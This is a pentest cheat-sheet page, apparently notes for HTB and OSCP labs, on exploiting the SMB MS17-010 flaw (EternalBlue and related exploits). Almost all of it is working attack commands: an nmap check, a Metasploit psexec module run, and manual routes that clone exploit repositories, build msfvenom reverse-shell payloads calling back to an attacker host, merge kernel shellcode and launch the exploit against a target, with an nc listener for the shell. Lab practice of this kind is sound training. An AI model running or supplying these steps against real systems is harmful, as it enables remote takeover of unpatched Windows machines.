############
SMB MS17-010
############

| MS17-010 (EternalBlue & others)

*****
Check
*****

.. code-block:: bash

  sudo nmap -sC -p 445 --script smb-vuln-ms17-010.nse 1.2.3.4

*******
Exploit
*******

Metasploit
**********

| EternalChampion/EternalSynergy
| It's working on HTB and OSCP lab and it's stable

.. code-block:: bash

  echo -e '
  run post/windows/manage/migrate
  search -f root.txt
  search -f user.txt
  ' > /tmp/auto.rc
  
  sudo msfconsole -x '
  use windows/smb/ms17_010_psexec;
  set RHOSTS 1.2.3.4;
  set LHOST 4.3.2.1;
  set AutoRunScript "multi_console_command -r /tmp/auto.rc";
  run;'


Manual (named pipe)
*******************

| That works for OSCP (XP) lab but doesn't for HTB 
| This isn't EternalBlue (maybe Champion/Synergy/Romance), and it's stable

.. code-block:: bash

  # Listen with : nc -lnvp 4444

  RHOST="1.2.3.4"
  LHOST="4.3.2.1"
  LPORT="4444"

  cd $(mktemp -d) && git clone https://github.com/helviojunior/MS17-010.git .
  msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT EXITFUNC=thread -f exe -a x86 --platform windows -o rs.exe
  python2 send_and_execute.py $RHOST rs.exe


Manual (no pipe)
****************

| Classic EternalBlue, it's highly unstable, sometimes you need to try multiple times or reboot machine
| Exploit7 is for W7 and exploit8 for W8 and above
| It doesn't work for OSCP lab but does for HTB

.. code-block:: bash

  # Listen with : nc -lnvp 4444

  RHOST="1.2.3.4"
  LHOST="4.3.2.1"
  LPORT="4444"

  cd $(mktemp -d) && git clone https://github.com/worawit/MS17-010.git .
  cd shellcode/
  nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
  nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
  msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw -o sc_x86_msf.bin EXITFUNC=thread
  msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -a x64 -f raw -o sc_x64_msf.bin EXITFUNC=thread
  cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
  cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
  python2 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
  cd ..

  python2 eternalblue_exploit7.py $RHOST ./shellcode/sc_all.bin

| By merging shellcode you don't have to care about target arch
|
|
| Python3 project to try : https://github.com/3ndG4me/AutoBlue-MS17-010 


